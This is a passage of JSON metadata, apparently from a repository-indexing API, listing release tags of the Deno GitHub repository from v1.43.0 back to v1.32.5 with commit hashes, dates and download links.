06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/den